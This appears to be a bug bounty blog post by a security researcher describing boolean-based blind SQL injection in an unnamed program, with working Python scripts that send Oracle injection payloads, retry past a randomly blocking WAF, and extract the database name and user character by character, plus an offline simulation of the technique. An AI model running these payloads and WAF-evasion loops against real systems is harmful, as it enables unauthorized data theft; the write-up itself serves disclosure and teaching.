SQL Injection and A silly WAF

July 25, 2018

Hi Folks,

Today I'll be writing about some interesting SQL injection vulnerabilities I recently found. This is a private program, so I won't be mentioning who the vendor is.

#1: WAF? ok!

At a lovely hacking night I started testing for a private bug bounty program. After about 30 minutes of throwing random single and double quotes into all the parameters, one of the endpoints returned an error saying:

{"error":"An unexpected error has occured"}

So I looked at the request and set the value of the parameter to `23' and '1'='1`, and as expected the endpoint returned valid results (the injected condition is always true, so the query behaves exactly as it did with the plain value), which means it's vulnerable to SQL injection! That's it, a lovely basic boolean-based SQL injection; let's write the report and get a nice bounty!

But... THE WAF!

While further exploiting this vulnerability to extract data from the database as a proof of concept, the endpoint started returning

{"error":" undergoing corrective maintenance "}

even to normal requests without any SQLi payloads. I later realized that this is probably the WAF blocking some random requests when it suspects an IP address, which explains why other researchers haven't reported this obvious SQLi before (maybe they thought it was a false positive. I also thought that; it took me some time to understand what was going on!)
So I wrote a Python script that detects when the WAF has blocked a request (the response contains "undergoing corrective maintenance") and repeats it until we get a response from the server. If we get "Error" or "True", that means we are talking to the server:

```python
import requests

URL = "http://target/vulnerable"
cookies = {}  # session cookies for the target
# Characters to try at each position. The list in the original post was
# mangled by the page extraction; lowercase letters, digits and underscore
# cover lower(ora_database_name).
charset = "abcdefghijklmnopqrstuvwxyz0123456789_"
WAF_BLOCK = "undergoing corrective"


def send(payload):
    """POST the payload and keep repeating the request while the answer
    comes from the WAF instead of the server."""
    while True:
        try:
            r = requests.post(URL, data={"serialNumber": payload},
                              cookies=cookies, timeout=15)
        except requests.exceptions.Timeout:
            print("Timed out, retrying")
            continue
        if WAF_BLOCK in r.text:  # silly WAF? repeat the request
            print("Repeating request")
            continue
        return r.text


res = ""
restart = True
while restart:
    restart = False
    for ch in charset:
        # "_" is a LIKE wildcard, so escape it. Oracle has no default escape
        # character; the ESCAPE clause declares one, and the application's own
        # closing quote terminates the ESCAPE literal.
        pattern = (res + ch).replace("_", "\\_")
        p = ("23' AND (select lower(ora_database_name) from dual) like '"
             + pattern + "%' ESCAPE '\\")  # SQL query
        body = send(p)
        if "SESSION_EXPIRED" in body:
            print("ERROR - SESSION_EXPIRED")
            break
        if "true" in body:  # no error: correct character, extend the prefix
            res += ch
            print(res, "found")
            restart = True
            break
```

The PoC worked, I reported the vulnerability and received the bounty. I didn't stop right there: now knowing how the WAF works, I kept testing all the other endpoints and found a couple more with the same technique. Ok, that probably was not that hard, let's move on to the next level.

#2: Fuck you WAF!

One of the endpoints (a non-JSON one) was also vulnerable to boolean-based SQL injection similar to the one above, but the WAF this time was acting differently. When my SQL query evaluated to `true` the response had a specific word, let's say `2222`, but when it evaluated to false, the application returned a static error page. The problem was that the WAF was returning exactly the same response as when the query evaluated to false, which means I couldn't differentiate between a response sent by the WAF and a response sent by the server when the query evaluated to false, as they were exactly the same!
I kept trying to bypass the WAF but had no luck: it was returning the same error page for random requests even when the query evaluated to true, so I wasn't able to extract anything from the database. I was about to give up when I came across an idea: write a Python script that repeats any request returning the error page (which would mean the query evaluated to false) five times, to make sure we get a response from the server and not the WAF. Since the WAF was only blocking random requests, a genuinely true query gets through on one of the repeats, and it actually WORKED!

```python
import requests

URL = "https://target/vulnerable2/"
cookies = {}  # session cookies for the target
# Same note as above: the original character list was lost in extraction.
charset = "abcdefghijklmnopqrstuvwxyz0123456789_"
TRUE_MARK = "2222"  # present in the response only when the condition is true
RETRIES = 5         # repeats before a negative answer is trusted


def send(payload):
    """POST the payload, retrying on timeouts."""
    while True:
        try:
            return requests.post(URL, data={"Nbr": payload},
                                 cookies=cookies, timeout=15).text
        except requests.exceptions.Timeout:
            print("Timed out, retrying")


def condition_holds(payload):
    """The WAF's block page is identical to the server's 'false' page, so a
    negative answer is repeated up to RETRIES times to make sure we are
    talking to the server: the WAF blocks randomly, so a genuine 'true'
    shows up within a few attempts."""
    for _ in range(1 + RETRIES):
        if TRUE_MARK in send(payload):
            return True
    return False


res = ""
restart = True
while restart:
    restart = False
    for ch in charset:
        # "_" escaped as in the post. Without an ESCAPE clause Oracle treats
        # the backslash literally, but the trailing ",2222" leaves no obvious
        # place to add one in this payload, so it is kept as used.
        pattern = (res + ch).replace("_", "\\_")
        p = ("6214111' and (SELECT lower(user) from dual) like '"
             + pattern + "%,2222")  # SQL query, as sent to the target
        if condition_holds(p):
            res += ch
            print(res, "found")
            restart = True
            break
```

Again, bug hunted, silly WAF beaten, report sent and bounty granted! I wanted to write about another interesting SQL injection on the same program, but since it's a little bit different and has nothing to do with the WAF, I'll keep it for the next post.
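The two retry strategies from #1 and #2, modelled offline as an added example (this is not code from the original post): the endpoint, the value being extracted and the randomly blocking WAF are simulated in memory so the logic can be run and measured without a target. `SECRET`, the "error page" text, the block probability and the seed are constructed assumptions; the payload shape, the `2222` marker and the maintenance message come from the post. It also makes explicit what the post leaves implicit: if the WAF blocks each request independently with probability p and a negative is repeated k times, a true answer in case #2 is lost only when all k attempts are blocked, i.e. with probability p^k, which is why "repeat the negatives five times" works.

```python
"""Offline model of the two WAF behaviours in the post and the retry logic
that defeats them. Added example: target, secret and WAF are simulated."""
import random
import re

SECRET = "app_user"  # constructed stand-in for lower(user) / ora_database_name
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"
BLOCK_MSG = "undergoing corrective maintenance"  # case #1: the WAF's own reply
TRUE_MSG = "2222"          # marker present when the injected condition holds
FALSE_MSG = "error page"   # constructed: the server's reply when it does not


def like_escape(prefix):
    """Escape LIKE metacharacters so the prefix is matched literally. Oracle
    has no default escape character, so the payload must also say ESCAPE."""
    return re.sub(r"([\\%_])", r"\\\1", prefix)


def build_payload(prefix, column="lower(user)"):
    """Boolean-based payload in the shape used in the post. The application
    appends the closing quote, which here terminates the ESCAPE literal."""
    return ("6214111' AND (SELECT " + column + " FROM dual) LIKE '"
            + like_escape(prefix) + "%' ESCAPE '\\")


class SimulatedTarget:
    """Constructed model of the vulnerable endpoint behind a WAF that drops a
    random fraction p_block of requests. distinct_block=True is case #1 (the
    WAF answers with its own message); False is case #2 (its answer is
    identical to the server's 'false' page)."""

    def __init__(self, p_block, distinct_block, seed=0):
        self.rng = random.Random(seed)
        self.p_block = p_block
        self.distinct_block = distinct_block
        self.requests = 0

    def send(self, payload):
        self.requests += 1
        if self.rng.random() < self.p_block:
            return BLOCK_MSG if self.distinct_block else FALSE_MSG
        # Stand-in for the database: recover the literal prefix under test
        # (undoing the LIKE escaping) and evaluate the condition on SECRET.
        escaped = re.search(r"LIKE '(.*)%' ESCAPE", payload).group(1)
        prefix = re.sub(r"\\(.)", r"\1", escaped)
        return TRUE_MSG if SECRET.startswith(prefix) else FALSE_MSG


def ask(send, prefix, block_marker=None, retries=5):
    """Decide whether the value starts with `prefix`.

    block_marker set  -> case #1: a blocked request is recognisable; repeat it
                         until a genuine answer arrives (capped at `retries`).
    block_marker None -> case #2: a block is indistinguishable from 'false', so
                         a negative is only trusted after `retries` in a row.
                         A true answer is lost only if every attempt was
                         blocked: probability p_block ** retries.
    """
    payload = build_payload(prefix)
    for _ in range(retries):
        resp = send(payload)
        if block_marker is not None and block_marker in resp:
            continue  # talked to the WAF, not the server
        if TRUE_MSG in resp:
            return True
        if block_marker is not None:
            return False  # a genuine server answer, and it was negative
    if block_marker is not None:
        raise RuntimeError("blocked %d times in a row for %r" % (retries, prefix))
    return False  # `retries` consecutive negatives: treat as false


def extract(send, charset, block_marker=None, retries=5, max_len=64):
    """Recover the value one character at a time, rescanning the charset
    after every hit, exactly as the post's loops do."""
    found = ""
    while len(found) < max_len:
        for ch in charset:
            if ask(send, found + ch, block_marker, retries):
                found += ch
                break
        else:
            break  # no candidate matched: the value is complete
    return found


def miss_probability(p_block, retries, value_len):
    """Case #2: chance that at least one true character of a value_len-long
    value is misread as false, i.e. blocked on all `retries` attempts."""
    return 1 - (1 - p_block ** retries) ** value_len


if __name__ == "__main__":
    case1 = SimulatedTarget(p_block=0.25, distinct_block=True, seed=1)
    case2 = SimulatedTarget(p_block=0.25, distinct_block=False, seed=1)
    print(extract(case1.send, CHARSET, block_marker=BLOCK_MSG, retries=20),
          case1.requests, "requests (case #1)")
    print(extract(case2.send, CHARSET, retries=10),
          case2.requests, "requests (case #2)")
    print("P(miss) for 8 chars, 5 repeats, p=0.25: %.4f"
          % miss_probability(0.25, 5, 8))
```

Run as a script it prints both recovered values and the request counts. The counts show the price of the indistinguishable WAF: in case #2 every genuinely negative answer costs the full number of repeats, so extraction is several times more expensive than in case #1, where only blocked requests are repeated. Choose the repeat count from the observed block rate and the expected length of the value with `miss_probability`, rather than a fixed five, and treat a final result with suspicion if a prefix suddenly stops matching anything: that is what a lost true answer looks like.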
That's it for today. If you have any questions, drop me a tweet @Zombiehelp54

Comments

Unknown, March 17, 2019 at 9:51 PM
Hi sir. I think I found a boolean-based SQL injection, but the problem is it is in image download functionality. So when I try to use version() in the vulnerable column it isn't printing the version. Please help

Linda, May 5, 2019 at 3:50 PM
Noice
Author: Mahmoud Gamal